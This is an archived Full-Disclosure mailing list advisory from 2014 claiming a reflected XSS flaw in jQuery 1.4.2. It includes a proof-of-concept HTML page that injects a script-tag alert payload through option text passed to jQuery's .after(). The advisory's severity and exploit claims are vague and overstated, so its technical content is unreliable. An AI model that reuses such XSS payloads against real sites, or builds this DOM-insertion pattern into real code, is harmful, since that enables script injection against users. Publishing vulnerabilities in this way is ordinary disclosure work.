lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 2 Sep 2014 13:50:26 -0300
From: Mauro Risonho de Paula Assumpção
	<mauro.risonho@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] XSS Reflected JQuery 1.4.2 - Create object option in runtime
	client-side

XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side
From: Mauro Risonho de Paula Assumpção
Date: 02.09.2014 13:21:20 -0300

VSLA Security Advisory FIRE-XSS-Reflected-Jquery 1.4.2 2014-001:
XSS Reflected JQuery 1.4.2

LEVEL: MEDIUM
In our tests authorized by the customer, we can stop the entire plant.

Published: 09/01/2014
Version: 1.0

Vendor: Jquery (https://jquery.org/)
Product: Jquery 1.4.2 (
http://blog.jquery.com/2010/02/19/jquery-142-released/)
Version affected: 1.4.2

Product description:
Jquery is a open source software.
jQuery is a cross-platform JavaScript library designed to simplify the
client-side scripting of HTML(1).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Create object option in runtime client-side and insert XSS
Reflected
‘index.html’ page, by phishing or fake site remote.

CVE: CVE-2014-? (feedback cve mitre)

Proof of Concept:
Exploit:jquery-xss-reflected.com.br.html

<!DOCTYPE html>
<! -- Mauro Risonho de Paula Assumpcao -->
<! -- aka firebits mauro.risonho@...il.com -->
<! -- Exploit jQuery JavaScript Library v1.4.2 -->
<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil                            -->
<! --   _____.__              ___.   .__  __
-->
<! -- _/ ____\__|______   ____\_ |__ |__|/  |_  ______                -->
<! -- \   __\|  \_  __ \_/ __ \| __ \|  \   __\/  ___/                -->
<! -- |  |  |  ||  | \/\  ___/| \_\ \  ||  |  \___ \                 -->
<! -- |__|  |__||__|    \___  |___  /__||__| /____  |                -->
<! --                        \/    \/             \/                 -->
<! -- bits on fire - 1989-2014 - brazil                             -->
<! --                                                                 -->
<! -- * jQuery JavaScript Library v1.4.2                            -->
<! -- * http://jquery.com/                                            -->
<! -- *                                                                -->
<! -- * Copyright 2010, John Resig                                    -->
<! -- * Dual licensed under the MIT or GPL Version 2 licenses.        -->
<! -- * http://jquery.org/license                                    -->
<! -- *                                                                -->
<! -- * Includes Sizzle.js                                            -->
<! -- * http://sizzlejs.com/                                        -->
<! -- * Copyright 2010, The Dojo Foundation
-->
<! -- * Released under the MIT, BSD, and GPL Licenses.                -->
<! -- *                                                                -->
<! -- * Date: Sat Feb 13 22:33:48 2010 -0500                        -->
<! -- */                                                            -->

<html>
<head>
  <meta charset="utf-8">
  <title>XSS Reflected - Jquery 1.4.2 </title>
  <script src="http://<target>/js/jquery.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>


<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected">&lt;script&gt;alert(&#x27;xss
reflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil
@firebitsbr - mauro.risonho@...il.com&#x27;);&lt;/script&gt;</option>
      </select>
    </p>
  </form>
</body>
</html>


Vendor Response:
<It was not sent to the vendor, but this is sending to the MITRE CVE to
contact the vendor.> from VSLA Virtual Security Labs Anywhere.

VSLA Virtual Security Labs Anywhere recommends installing the hotfix,
hardware/software to be putting in a production environment.

Remediation Steps:
Update jquery 1.11.1

Vendor Communication Timeline:
09/01/2014     – Vulnerability disclosed
?             – Confirmation to release vulnerabilities
?             – Advisory published

References

1. Wikipedia http://en.wikipedia.org/wiki/JQuery
2. Jquery http://jquery.com/
3. VSLA Virtual Security Labs Anywhere https://firebitsbr.wordpress.com

About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on security
the information.
https://firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ